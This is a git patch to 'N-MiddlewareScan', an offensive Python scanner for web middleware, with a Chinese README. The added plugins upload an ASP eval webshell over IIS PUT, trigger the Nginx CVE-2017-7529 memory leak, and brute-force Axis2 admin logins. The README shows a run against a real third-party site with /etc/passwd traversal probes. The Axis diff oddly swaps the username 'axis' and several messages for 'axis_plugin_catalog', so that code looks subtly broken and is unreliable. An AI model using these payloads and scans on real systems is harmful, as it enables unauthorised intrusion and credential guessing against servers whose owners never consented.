From ca723d669c1b2bc63a4bc935ea7dcf0779abf005 Mon Sep 17 00:00:00 2001 From: nihaohello <34113556+nihaohello@users.noreply.github.com> Date: Sat, 30 Mar 2019 23:03:09 +0800 Subject: [PATCH] complete --- N-MiddlewareScan.py | 16 +- README.md | 130 +++++ __pycache__/config.cpython-37.pyc | Bin 180 -> 342 bytes _update.py | 0 config.py | 22 +- old_plugins/axis.py | 16 +- plugins/IIS_special_plugin_.py | 42 ++ plugins/Nginx_special_plugin_.py | 30 ++ .../IIS_special_plugin_.cpython-37.pyc | Bin 0 -> 1493 bytes .../Nginx_special_plugin_.cpython-37.pyc | Bin 0 -> 1285 bytes .../__pycache__/axis_plugin.cpython-37.pyc | Bin 1249 -> 1264 bytes .../__pycache__/jboss_plugin.cpython-37.pyc | Bin 0 -> 777 bytes .../jboss_special_plugin_.cpython-37.pyc | Bin 0 -> 1156 bytes plugins/__pycache__/plugins.cpython-37.pyc | Bin 2257 -> 4225 bytes .../__pycache__/resin_plugin.cpython-37.pyc | Bin 1598 -> 1879 bytes .../special_plugin_.cpython-37.pyc | Bin 0 -> 1271 bytes .../spring_special_plugin_.cpython-37.pyc | Bin 0 -> 2210 bytes .../__pycache__/struts2_plugin.cpython-37.pyc | Bin 0 -> 264 bytes .../struts2_special_plugin_.cpython-37.pyc | Bin 0 -> 31439 bytes .../__pycache__/tomcat_plugin.cpython-37.pyc | Bin 0 -> 287 bytes .../tomcat_special_plugin_.cpython-37.pyc | Bin 0 -> 3132 bytes plugins/__pycache__/user_agent.cpython-37.pyc | Bin 24707 -> 24826 bytes .../weblogic_plugin.cpython-37.pyc | Bin 0 -> 265 bytes .../weblogic_special_plugin_.cpython-37.pyc | Bin 0 -> 1607 bytes plugins/axis_plugin.py | 4 +- plugins/jboss_plugin.py | 53 ++ plugins/jboss_special_plugin_.py | 23 + plugins/plugins.py | 172 ++++--- plugins/special_plugin_.py | 28 ++ plugins/spring_special_plugin_.py | 64 +++ plugins/struts2_plugin.py | 15 + plugins/struts2_special_plugin_.py | 458 ++++++++++++++++++ plugins/test.py | 7 - plugins/tomcat_plugin.py | 15 + plugins/tomcat_special_plugin_.py | 84 ++++ plugins/user_agent.py | 2 +- plugins/weblogic_exp/CVE_2017_10271_linux.py | 150 ++++++ plugins/weblogic_exp/CVE_2017_10271_win.py | 121 +++++ plugins/weblogic_exp/CVE_2018_2893.py | 73 +++ plugins/weblogic_exp/CVE_2018_2894.py | 132 +++++ plugins/weblogic_exp/__init__.py | 10 + plugins/weblogic_plugin.py | 15 + plugins/weblogic_poc/CVE_2015_4852.py | 57 +++ plugins/weblogic_poc/CVE_2016_0638.py | 68 +++ plugins/weblogic_poc/CVE_2016_3510.py | 68 +++ plugins/weblogic_poc/CVE_2017_3248.py | 68 +++ plugins/weblogic_poc/CVE_2017_3506.py | 72 +++ plugins/weblogic_poc/CVE_2018_2628.py | 80 +++ plugins/weblogic_poc/CVE_2018_2893.py | 85 ++++ plugins/weblogic_poc/__init__.py | 10 + .../__pycache__/CVE_2015_4852.cpython-37.pyc | Bin 0 -> 4462 bytes .../__pycache__/CVE_2016_0638.cpython-37.pyc | Bin 0 -> 11024 bytes .../__pycache__/CVE_2016_3510.cpython-37.pyc | Bin 0 -> 11041 bytes .../__pycache__/CVE_2017_3248.cpython-37.pyc | Bin 0 -> 10996 bytes .../__pycache__/CVE_2017_3506.cpython-37.pyc | Bin 0 -> 2528 bytes .../__pycache__/CVE_2018_2628.cpython-37.pyc | Bin 0 -> 7184 bytes .../__pycache__/CVE_2018_2893.cpython-37.pyc | Bin 0 -> 7405 bytes .../__pycache__/__init__.cpython-37.pyc | Bin 0 -> 447 bytes .../__pycache__/managerURL200.cpython-37.pyc | Bin 0 -> 1270 bytes .../__pycache__/uddi_ssrf.cpython-37.pyc | Bin 0 -> 1227 bytes plugins/weblogic_poc/managerURL200.py | 32 ++ plugins/weblogic_poc/uddi_ssrf.py | 31 ++ plugins/weblogic_special_plugin_.py | 51 ++ 63 files changed, 2218 insertions(+), 86 deletions(-) create mode 100644 _update.py create mode 100644 plugins/IIS_special_plugin_.py create mode 100644 plugins/Nginx_special_plugin_.py create mode 100644 plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/jboss_plugin.cpython-37.pyc create mode 100644 plugins/__pycache__/jboss_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/spring_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/struts2_plugin.cpython-37.pyc create mode 100644 plugins/__pycache__/struts2_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/tomcat_plugin.cpython-37.pyc create mode 100644 plugins/__pycache__/tomcat_special_plugin_.cpython-37.pyc create mode 100644 plugins/__pycache__/weblogic_plugin.cpython-37.pyc create mode 100644 plugins/__pycache__/weblogic_special_plugin_.cpython-37.pyc create mode 100644 plugins/jboss_plugin.py create mode 100644 plugins/jboss_special_plugin_.py create mode 100644 plugins/special_plugin_.py create mode 100644 plugins/spring_special_plugin_.py create mode 100644 plugins/struts2_plugin.py create mode 100644 plugins/struts2_special_plugin_.py delete mode 100644 plugins/test.py create mode 100644 plugins/tomcat_plugin.py create mode 100644 plugins/tomcat_special_plugin_.py create mode 100644 plugins/weblogic_exp/CVE_2017_10271_linux.py create mode 100644 plugins/weblogic_exp/CVE_2017_10271_win.py create mode 100644 plugins/weblogic_exp/CVE_2018_2893.py create mode 100644 plugins/weblogic_exp/CVE_2018_2894.py create mode 100644 plugins/weblogic_exp/__init__.py create mode 100644 plugins/weblogic_plugin.py create mode 100644 plugins/weblogic_poc/CVE_2015_4852.py create mode 100644 plugins/weblogic_poc/CVE_2016_0638.py create mode 100644 plugins/weblogic_poc/CVE_2016_3510.py create mode 100644 plugins/weblogic_poc/CVE_2017_3248.py create mode 100644 plugins/weblogic_poc/CVE_2017_3506.py create mode 100644 plugins/weblogic_poc/CVE_2018_2628.py create mode 100644 plugins/weblogic_poc/CVE_2018_2893.py create mode 100644 plugins/weblogic_poc/__init__.py create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2015_4852.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2016_0638.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2016_3510.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2017_3248.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2017_3506.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2018_2628.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/CVE_2018_2893.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/__init__.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/managerURL200.cpython-37.pyc create mode 100644 plugins/weblogic_poc/__pycache__/uddi_ssrf.cpython-37.pyc create mode 100644 plugins/weblogic_poc/managerURL200.py create mode 100644 plugins/weblogic_poc/uddi_ssrf.py create mode 100644 plugins/weblogic_special_plugin_.py diff --git a/N-MiddlewareScan.py b/N-MiddlewareScan.py index f031188..b3ab397 100644 --- a/N-MiddlewareScan.py +++ b/N-MiddlewareScan.py @@ -11,16 +11,16 @@ from concurrent.futures import ThreadPoolExecutor from plugins import plugins #80,4848,7001,7002,8000,8001,8080,8081,8888,9999,9043,9080 class MiddlewareScan(object): - def __init__(self,url,options): - self.url=url - self.options=options + def __init__(self,arg,ThreadNum): + self.arg=arg + self.ThreadNum=ThreadNum def run(self): - P = plugins.plugins(self.url,self.options) + P = plugins.plugins(self.arg,self.ThreadNum) P.run() def main(): arg = argparse.ArgumentParser(description='MiddlewareScan By Naivete') arg.add_argument('-u', '--url', help='url site', dest='url') - arg.add_argument('-i', '--file', help='file name', dest='file') + arg.add_argument('-i', '--file', help='file name , fill url ', dest='file') arg.add_argument('-p', '--options', help='options', dest='options') arg.add_argument('-t', '--thread', help='thread num', dest='thread') arg = arg.parse_args() @@ -30,7 +30,7 @@ def main(): arg.options="all" if arg.url: try: - S=MiddlewareScan(arg.url,arg.options) + S=MiddlewareScan(arg,config) S.run() except Exception: print(traceback.print_exc()) @@ -41,14 +41,14 @@ def main(): for url in f.readlines(): try: url=url.rstrip("\n") - S=MiddlewareScan(url,arg.options) + S=MiddlewareScan(arg,config) excetor.submit(S.run()) except Exception: pass f.close() except Exception: print(traceback.print_exc()) - print("相关漏洞检测完成。") + print("\n\n相关漏洞检测完成。") if __name__ == '__main__': print("开始检测中间件相关漏洞:") main() \ No newline at end of file diff --git a/README.md b/README.md index 191c69c..41f96c8 100644 --- a/README.md +++ b/README.md @@ -1,5 +1,135 @@ +1. 最近在看web中间件的漏洞 看到一个三年前的脚本:https://github.com/ywolf/F-MiddlewareScan 想着自己写一个中间件相关的,正是脚本好写,poc和exp难 github链接:https://github.com/nihaohello/N-MiddlewareScan + + +2. +#plugins vuln poc exp +主要是下面模块: +1.axis +xss 弱密码 +2.glashfish +3.jboss +4.resin +5.weblogic +6.tomcat +7.struts2 +8.IIS +9.fastcgi +10.phpcgi +11.apache +12.nginx +13.spring mvc + + +借用和拉用了(有些也许没有写到): +axis,glassfish,nginx,iis: +https://github.com/rabbitmask/WeblogicR + + +jboss: +https://github.com/search?l=Python&q=jboss&type=Repositories +https://github.com/SkewwG/VulScan/blob/master/Jboss/CVE-2017-12149.py + +weblogic: +https://github.com/search?l=Python&q=weblogic&type=Repositories +https://www.exploit-db.com/ :有poc +https://nvd.nist.gov/vuln/detail/CVE-2017-10271 +https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html +https://github.com/rabbitmask/WeblogicR poc来自这 +https://github.com/kingkaki/weblogic-scan + + +tomcat: +https://github.com/search?l=Python&q=tomcat&type=Repositories +https://github.com/SkewwG/VulScan + + +struts2: +https://github.com/search?l=Python&q=struts2&type=Repositories + + +spring: +http://cve.mitre.org/cgi-bin/cvekey.cgi?keyword=spring +https://www.exploit-db.com/ 18年 + + + + + + +3. +测试例子: +python N-MiddlewareScan.py -u https://www.baidu.com + +第一部分standard_poc 测试开始: +*********************** +https://www.baidu.com CVE_2018_10661 测试结束 +https://www.baidu.com/axis2/axis2-web/HappyAxis.jsp信息扫描完成 +https://www.baidu.com/axis2/axis2-admin/login弱口令扫描完成 +https://www.baidu.com/j_security_check?loginButton=Login 测试结束 +https://www.baidu.com exist Directory_traversal vuln 测试结束 +https://www.baidu.com/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo 扫描完成 +https://www.baidu.com/web-console/Invoker 扫描完成 +https://www.baidu.com/invoker/JMXInvokerServlet 扫描完成 +https://www.baidu.com/admin-console/ 扫描完成 +https://www.baidu.com/resin-admin/j_security_check?j_uri=index.php扫描完成 +https://www.baidu.com/resin-doc/resource/tutorial/jndi-appconfig/test?inputFile=/etc/passwd扫描完成 +https://www.baidu.com/resin-doc/viewfile/?contextpath=/otherwebapp&servletpath=&file=WEB-INF/web.xml扫描完成 +https://www.baidu.com/%20..\web-inf扫描完成 +https://www.baidu.com/%3f.jsp扫描完成 +https://www.baidu.com/resin-doc/examples/jndi-appconfig/test?inputFile=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd扫描完成 + + + +第一部分 standard_poc 没有测试出任何的漏洞。 + + + +第二部分: +开始测试特定的poc脚本: +*********************** +对tomcat weak password 进行检测 +CVE_2015_4852 脚本出错 +CVE_2016_0638 脚本出错 +CVE_2016_3510 脚本出错 +CVE_2017_3248 脚本出错 +[-]目标weblogic未检测到CVE-2017-3506 +CVE_2018_2893 脚本出错 +CVE_2018_2628 脚本出错 +managerURL200 脚本出错 +uddi_ssrf 脚本出错 +CVE_2017_12149 检测函数出错 +https://www.baidu.com +Code by Lucifer. +-------检测struts2漏洞-------- +目标url:https://www.baidu.com +目标不存在struts2-005漏洞.. +目标不存在struts2-009漏洞.. +目标不存在struts2-013漏洞.. +检测struts2-016超时.. +超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) +目标不存在struts2-019漏洞.. +检测struts2-devmode超时.. +超时原因: HTTPSConnectionPool(host='www.baidu.com', port=443): Read timed out. (read timeout=6) +目标不存在struts2-032漏洞.. +目标不存在struts2-033漏洞.. +目标不存在struts2-037漏洞.. +目标不存在struts2-045漏洞.. +目标不存在struts2-046漏洞.. +目标不存在struts2-048漏洞.. +目标不存在struts2-020漏洞.. +目标不存在struts2-052漏洞.. +目标不存在struts2-053漏洞.. +目标不存在struts2-057漏洞..(只提供检测) +[-]不存在SpringCVE-2017-8046漏洞! +[-] https://www.baidu.com 不存在IIS PUT上传 +Server 不存在 IIS shortname vulnerable +Server 不存在 IIS shortname vulnerable +[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危) + + +相关漏洞检测完成。 diff --git a/__pycache__/config.cpython-37.pyc b/__pycache__/config.cpython-37.pyc index 8f9631c53a9760e6c3e5f3eef66bf04073a3f9ac..9cdb7ba97ffe7c802f7b1263e799d39d5287ebd7 100644 GIT binary patch literal 342 zcmZXQ%SyvQ6ox0w6@Bp1W z2E&VDp5z(OG!Yr76E+0xcEXqg`kdMJ{S0W|o-#0Qrh}0??g1Uldk$!`(b!{OL}>C6 zC4RcYOF!L&i$KJ!R3tAv%zUSH7a=bBYaqBA2CM&zFj+lC&&TOzYhJ|(=1bl!erJ6k MK^2+(lEq2p7j73)vH$=8 delta 128 zcmcb{w1tt+iIU#Gic%9( z{7Q3IG88cb1;NBuPaw', 'System Components', 'axis2-admin/upload', 'include page="footer.inc">', 'axis2-admin/logout'] - user_list = ['axis', 'admin', 'manager', 'root'] - pass_list = ['', 'axis', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', + user_list = ['axis_plugin_catalog', 'admin', 'manager', 'root'] + pass_list = ['', 'axis_plugin_catalog', 'axis2', '123456', '12345678', 'password', '123456789', 'admin123', 'admin888', 'admin1', 'administrator', '8888888', '123123', 'admin', 'manager', 'root'] for user in user_list: for password in pass_list: @@ -31,14 +31,14 @@ def axis_admin(host): request = requests.post(url=login_url, data=PostStr, headers=headers) res_html = res.text except Exception: - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' for flag in flag_list: if flag in res_html: info = '%s Axis Weak password %s:%s' % (login_url, user, password) return 'YES|' + info - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' except Exception: - return 'axis no weak password。' + return 'axis_plugin_catalog no weak password。' def axis_info(host): try: @@ -49,13 +49,13 @@ def axis_info(host): s = requests.get(url=url, headers=headers) res_html = s.text except Exception: - return 'no axis info。' + return 'no axis_plugin_catalog info。' if "Axis2 Happiness Page" in res_html: info = vul_url + " Axis Information Disclosure" return 'YES|' + info - return 'no axis info。' + return 'no axis_plugin_catalog info。' except Exception: - return 'no axis info。' + return 'no axis_plugin_catalog info。' def axis(url): cve__2018_10661=CVE_2018_10661(url) print(cve__2018_10661) diff --git a/plugins/IIS_special_plugin_.py b/plugins/IIS_special_plugin_.py new file mode 100644 index 0000000..0cd709b --- /dev/null +++ b/plugins/IIS_special_plugin_.py @@ -0,0 +1,42 @@ +#coding=utf-8 +import requests +import sys +import http.client +import urllib.parse +import threading +import queue +import time +def IIS_PUT(arg,config): + try: + url = arg.url + data = '<%eval request("1111111111")%>' + res = requests.put(url=url, data=data, timeout=5) + html_text = requests.get(url).text + if '<%eval request("1111111111")%>' in html_text: + print(('[+] {} 存在IIS PUT上传'.format(url))) + requests.delete(url) + print(('[+] {} 成功删除测试文件'.format(url))) + else: + print(('[-] {} 不存在IIS PUT上传'.format(url))) + except Exception as e: + print(e) + +def IIS_shortname_Scanner(url): + try: + for _method in ['GET', 'OPTIONS']: + if _method == 'GET': + status_1 = requests.get(url+ '/*~1*/a.aspx') # an existed file/folder + status_2 = requests.get(url + '/l1j1e*~1*/a.aspx') # not existed file/folder + else: + status_1 = requests.options(url + '/*~1*/a.aspx') # an existed file/folder + status_2 = requests.options(url + '/l1j1e*~1*/a.aspx') # not existed file/folder + if status_1.status_code == 404 and status_2.status_code != 404: + print("Server 存在 IIS shortname vulnerable") + else: + print("Server 不存在 IIS shortname vulnerable") + return False + except Exception as e: + raise Exception('[is_vul.Exception] %s' % str(e)) +def IIS_special_plugin_(arg,config): + IIS_PUT(arg,config) + IIS_shortname_Scanner(arg.url) \ No newline at end of file diff --git a/plugins/Nginx_special_plugin_.py b/plugins/Nginx_special_plugin_.py new file mode 100644 index 0000000..699c101 --- /dev/null +++ b/plugins/Nginx_special_plugin_.py @@ -0,0 +1,30 @@ +#coding=utf-8 +# Nginx信息泄露!python3 NginxCVE-2017-7529.py http://207.246.80.61:8000/proxy/demo.png +# 敏感信息有KEY等等 +import requests +from termcolor import cprint + +class NginxCVE_2017_7529(): + def attack(self, url): + #url = r'http://207.246.80.61:8000/' + try: + a = requests.get(url) + start = int(a.headers['Content-Length']) + 300 + end = 0x8000000000000000 - start + + headers = { + "Range": "bytes=-{},-{}".format(start, end) + } + res = requests.get(url=url, headers=headers, stream=True, timeout=10) + ret = res.raw.read(500) + code = res.status_code + + if code == 206: + print( "[+]存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") + else: + print("[-]不存在Nginx越界读取缓存漏洞(CVE-2017-7529)漏洞...(低危)") + except Exception as e: + cprint("[-] " + __file__ + "====>连接超时", "cyan") + +def Nginx_special_plugin_(arg,config): + NginxCVE_2017_7529().attack(arg.url) \ No newline at end of file diff --git a/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc b/plugins/__pycache__/IIS_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..d1e159db06da0e26e1a140164250f253ab16f25a GIT binary patch literal 1493 zcmZ`(-D@0G6u%$ywVO@Y+D1jIE`=1Qk`3EODMhqZ^5C|xQR_5eneM&aoz3j*^v<1_ zth0S+1WTphgNlOC6ns#q2!c}3zvRA}1oJQW)N}7{lZf>WbH4AHbMO4ld3$!Yj9@*w z^I)~&AoQ13o-P8yTkvKpKp0{;M!|&R02`eI)Nm`X4R->^a5r!b_X3X*Mn6MAiCN4B zUS`DNrAc3BzM5ai0{VpgP}uI<_RURpztdQ zTcb_M@Flbsk8yz+StsJWL_4@ZjJ|*#;xU*&CiS!X-UJF?Oq4lzOgwfc-XmknyRFY0%ZR6+BHok))3ZAib+q#B6MhUqF z8i17IzESQp`lSFb3jkwGN~BAh?l{8I5G6(&~0I0@*)Tl zW=4UxiSB=x9z_2}^D}VMrv_psfvMRiVivZDIZZV7kJWeb89-iukW9A@g4)Ds;C{v2 z8C=9x7R>adOzWLE;?RYbR#XLsMI7Czr=iHWaweK8$)4aLi;}LgVbDW{8s!sqd6^g$A literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc b/plugins/__pycache__/Nginx_special_plugin_.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..319d2dc03157988a8bb04fff1531115c4285bd5e GIT binary patch literal 1285 zcmb_c-D_M$6hAZfWAAP@F$V32p!G#?X?M}06vdX(SOl^AV5_NX%4NJW+1$Dsd*;ehr8FH zWpi>CYNc(Afo6?pH|WYRQGprn3PtB6YW5Tw0WHFzMLFRV<1KDsysc-N?J&7A`~GSF z=u0mj^N+oH^tHgm88K%zI*Xe9h^BW*!3r6WRWhWC4rs^X^g>j2Ym$d5L?=_Rt-;9cRVmWyC3=UmAJ?k5`tcjFiVGMub4(p;tBD z93-#Upvp@Xd6&SjOrXC{RrsWu*bjUP^@$O3G-nvY)vM+6@Bt+BJdUuw>1KawHcgaB zRQ(;1wAEsGgaAYi7PBiJw48TY(iZ*6k9taE$Lk*tkD#90Hnk%~RxTr5S`>^6nQ1pu zQm|N;R2YjiSK*%sxcvaP=5M3<@bHC=d*5t)`+dRd*4k%}zWjXa{;wN1zk0O(1+Hwa z-`xE9*3SATNO|2*UN@BQtbaOQXfzrxKK$**#_~_K{EUICUwHV-^8bX`w-N67{7J+; zj&fq__gkAc?rg1H-~4(_+d+>dwW{`{xR{GfW!h>Br7dhK>0*R-7g8BBoRRFZwvhv_ zCo;uUp7}w_g?5St)aBDx0?}1rnn=?}+VlN|FcQ9Bt7tnD(SkJOYr?dH(Gu}Q!p9jb zDKM+VtagD~!#od3s_vY*K-CnTBWL)pcv?BsF->jbrIgi9;CdJu+C67;Zqa2$% zn=gKapLInLvdACL`i*W+yG$t-EP0qBdj<_qN-AWAc-AzXAywj1k5p)tOq2e>$L~pF z9Nokg!6FkDW0AVz`*F&1Q?Rc3{>7X{;}v-b@r!EqnCHx#c>qeNnc>SL#rU5)Xy(j@ z;ttNBqhMt2Aav*|-j1TnNwa1ZQR5tj-x}2xlWlw!(qtiQ|0|__`adZ#R2PQ;B402d tj-0@cE-NA9AdOO4{L*nMvtbXciIt`t?Y%K3-~>K&keSx;NR>|Q`x{kmYzY7W literal 0 HcmV?d00001 diff --git a/plugins/__pycache__/axis_plugin.cpython-37.pyc b/plugins/__pycache__/axis_plugin.cpython-37.pyc index 502280fea96df0406820263eec52b7eef5310e56..fee96b47690b88e77907027ac254b3f69798c876 100644 GIT binary patch delta 189 zcmaFJ`GJ$yiITiQxkV8#(8ODuFs|h-4zPA0AIh?@ zu(-tr5xd0;rZbC6iV{omi*6~g10_KKY%EZVpC;oimV*4`;*|_VvOsf-WG5H1iIdo4>BJB diff --git a/plugins/__pycache__/jboss_plugin.cpython-37.pyc b/plugins/__pycache__/jboss_plugin.cpython-37.pyc new file mode 100644 index 0000000000000000000000000000000000000000..5b7578d80067f3fe077b065e2a59af515e6f6270 GIT binary patch literal 777 zcmb`FPis^$5Ww^P?4Ncmdl3rKLwm98!M?k=RtrU2*j_3kwXkGgW*@J8FNv9??d~UN zvCw`1@m>T!P7k??`yo7;Z1u?#J?VrD$^2%9nM}5pmKKSV+rh`f_YFe6_{&e}y2CTK z@ysbkSdax7@rwm4WDyJJ=lDa%u|~xjjx}qnRk4<1?HXIC*n(q=zgQL@5Z2izy?Zu# zvHfbgmmHO6k5a)=6p*~sW$~O*sfF64sm=xO=Nu)ZdawnQKjgH8{?SMvZr}tpl#lg9 zLVq9B38)=D7M7T|uB-o>bai&|X?At>_4DQI{JPh%T?Ow9pvIw)zD64vRoJGaik4_& zMm4qZxS*MBp-EFfXB^YKun}-(JCv0UjQ2#mwXtVA!{1w;pbd!0NRTXB%2iI-2h`nB5V<}R+ wAj|AZxQTvBzHTY-h$z zy|txEMQQ~^;lQVaAQln=2_z06p^Dx)bDV2yOZgW#@phdczGgLVesA7;zkP3Z-o8{Q z&(AKFW*6*JmtI?2xqRC8S&Q1QQm@4wd$}Qa zo0jK+uQYS^>}+Xq-d=ULT)_^a_Tz8-ieu_bgSvzYsWXbTDeowK#Pxl?T@#crK|Lk+ ze*@Pj@9{uEu0_=iX*CDAGuLMkB~gC)z_JFGsPHy#y<->8+e!VM=OFgcFFV5@J{x}V zt-XBpVr}Nk^kQv#W_s>HMmrp-N0>AZFYpOEvWq)6x)sZ!iL)mb@k+wYE36!=%!C;xVc+;byVmxp%+H^%-r=j#MR@bSJ3#APfiU|lC z$71mv5>J5o$Ca0tHo~sga7DWq3f_dH+o%**7$H90b_HGa+~B_(q2H;qKyEZQxs){- zQV))`Hr}n3!mghB=V@5*D)}S`gbkd+Cve`#!a9X>*v7|O_cHyKx)afD-tV_+7K$0Dw1EKUH@$Nx9I<6x3WKVuQ6 eCW+~9gb8)Rnth?oNyn$>V-6Yr46-?ev8frJ2sG)Rai6jg{P9_9(D`Dr91UU-P|#CPuOIzN~) zqkGQ%Irq*v_kQQxGv62(a2TFu_vdGxeu}Y=sL_9NsJw&{UIY!7T(D`ihDU1cMuVgS$hRldBEa zN8Az4PB38#W0eUb7+ulbg5W3Fgmn+vu&D{2j!rMgz!R@Eo3-QZz>lM*MDI}83jB&! zE4OO#e5FxNt*jDaY;Zn^%5fOTvNs18p@fG(0!9|XIxe(T2J3Xv1J>n) z37!*{u)$4{7Y?{33ec=54NUcQ5PFEyqTfUbkAfsTVP%$RpgiGK;u^RPt|wa605`yM z;JJAQYNBOvB@*7Wq-kw^?fbbtOkB`W@_KJDnitP z^PUV&`d;I|J9@i%rpNcUmQ%Z2t~4r9xjcwv!(kA{O}uvRHF;;aFWwjRIf>!1QSvBi zyZ((z1jMZXE#R8sd|iw54c_H+8gvqL3L-ymb+rhaSIw>POLJYleJL1X5MIYbLq%yeLv%l1ns5y)Fi@)lQNVgJ`XaA=T2?3kh2;!i~5$X&9H_Ii4kQ16QezzSu}_l z_)c|rMI*1kA#aquNzll@`z8K`I`-h_UwK0`mGN>xb??(H&^-S!jEF|)ZP-;-^un0D?8cd zWE1bc^@rQPx`J8QyN_3|+uS99iUkLm~S)}O{0v`I?ge}Q2(j2Xi z!=dk%j~qC1Ahm+FA0T|C1`VZVy(wa-u!E+ng~(5pvr6)+RF`pM9F=fC2vgqW@KIjm z4(g72ZRK|+-=%nw4{Dhgb_#tD#2P+196j_AvO+oE-%(k<9I+MF%|{fcxZvXib{$kp z@~9a?`?1l5dxftgPBka=MP0svesdl1s%j_ZI3ssy?@A0f#8|hG6d;#}W4#IoGsamr zxAf`^Lp`@>$e;9Pnga6@JDVFh$!43J29ETi!J@*VBmc%3z5SKItwkZiQhNNJVnk`RybpT)iw@4sSiL$U+xs0H6j{=h<(#e+` zI_}AmbB|ClF(Bz`Ol=t~#X%T_sg8R^p+FWe;1=KkQ5=^2CYGhGO---W3K}B&t`P<8 zNRCo}{x}X^#qYGxTdj<>aFq~Jl(^hYf`;%S56G!`^I=*DW8V+Lu-u?n-)jInUZs{{ z=4qP3Lv%qt!;L}^fk!?MasVYPfiSKCAiKB$(2OeJ6ak^_cn1}%I@>nkk{L_t`D7(M z1Q}Xb!Da{cYWc5%6L2cLTj)VY+k}n|5D;{9K&RN=9RUbCnSzIb11nZdz~c}>Lc!yZ zf`dl_XDpbh{!2yhZK zi+m5?tr0+n(QmG&+Jnjq+g-ceLTgC1 zL^rRrKitzEp&nzf7(unKy$zf{Zh@0o(Ab?>fG@nUl?@b**Z9)2Gemb#M)k;yYg^4& zx{m-(yZOU*8{dSj*x_2&Qhi51K}TgBX27cdqpKzlZuRA!t~W``rTaa*GfcV~><7WsPaL0Cmx-GTgGwh*@#PV}-E>dac-E;Nc4)G~0%9Rwdkp`KB+sXrSz zj7YK@WmF@%tnVn=pFw#FWlYW4u5||bkw#^B^f!hd9tyq42ay|QNgL|La(OBCYT1Y! zfljhSgf3oXv?Prmu|mZ^bvM%wBt_+r;uaFNyuH&Nu}3GirFys=s@N^JVaPSAVY4B> zj%qrJzrkMSx_>T?Vr2O0VBGP(zEAuStF#mutQRdvb!7C_)IthODyNn=8`2nAN9ky} sEI&n`bRPaVXZerWoTY!otqe)+7qjg+N`W{W1L^++QV6G)vWz1C52Bm~(*OVf literal 2257 zcmbVOJ!~9B6rP#=y&wNz5<51Lup)wV$e}<~QG`NB6e$u0DMk(}JFE5X#=if%nZ4wE z+NCi<2nA#zswjnBLP1GMK}ChAr-dd+G$~W@y;)xpgezvXZ{C}EGw=J}?7g{bGc#3& zHuv}AEiuQ~A7o6M1LZ1SHGoK1!aFP|dmeCOi$Iv(3M|vxft|9JbL1xCnDf%t3%pcd z%r~-^Lom12C)Kcw2uu?TqTy-LSK8||RhBfRuE!%OaVX)vW+&CIRGDlJbQSQr zgT4fQZ4dgf(oVdW#_fh9T|m2pCoZLD{9S1yrC$~ft=_+zc$qk0OhCwCM7Ypd|a z7vNo?h}(;WpZmGja&QC>b33Ubo;`fH$)Jn2Eq}>e_|_1;zGToGAlfDy-nCigwX5<^ z&gjY9%s;9eGn)Mrvv=@fj}rGx8!Y9wux6LpAy+tR(x%uC`S`PP1R3DlgQBwkBkVcE zoX1Koe;Yr7{ffc+O;H_x0c*inlcGjk|HZTlrWG)K)i8Y%z9rL@7fi9|{VCT&KD<9= zi}72To1DpNODs7HzJ@vU#k`u=?ukXVWEf)2txaGZUfD!0dKb!EVD;0}veA2VhwW$M z9(Dt37{4dl(u02OBhHKAJ3yJ)fSSkO9VhB_(;S%zzQ*ntq#Nj;o4p&Y%2>H`# zzQYxq=*ngpXKC4FVd$UyB+spvMTdU&!JJHoqf})oEDKX$-Mq1(-9aRyt_mELHYe$% z`UxuMrT3|FHmq{-SuEDxUK%B-q+ekt+I?a+^wcPhQ>7;U>e?zQ-sRQ6{`jNY8`@5y zEDCB-(rxy_osm>+ZEwg?s(q@}Jwr0y`e06eeZMy98 zMYTFz2whugFKN^bOzlR40Zd6HTKiM3+QN09?JON<+8M}ZFVmG9<2W^?SywU{#pzBI zw{^u#hUqvCP=iz!Sfi|iy{Q73ViQ;>O(s-OJ3$!sMqNqiF~Bufa)}H>^Xr))_Q#Uj3!hb=~9PLDF z%kf3%=kYG`$;`9_n%cVFaOu{dvq05F1un}f^m-T$M^UGokriN+XGjq4m$(>KRCUb- zNo7<~s(kKSzSo%3mfBZxmFDTcLtwX5zb7w3MTw8HJ^4CKQ6<(MZU*yBc+rlcIRZwt qJ`5$5=%D)IHZM=t?eEZCc^Vq+Un!ZqM|-OU2tYb{D8pxvnSTJE>Jsb# diff --git a/plugins/__pycache__/resin_plugin.cpython-37.pyc b/plugins/__pycache__/resin_plugin.cpython-37.pyc index 521ec974addb4c7c8c8fbc31191d43d74211e20a..cee7b258d2f2f4928fa02c69e7a7dbf96ae88972 100644 GIT binary patch delta 279 zcmdnTbDfXZiI*c|Q@@f5{$Mleq)oiRlg2$fM} 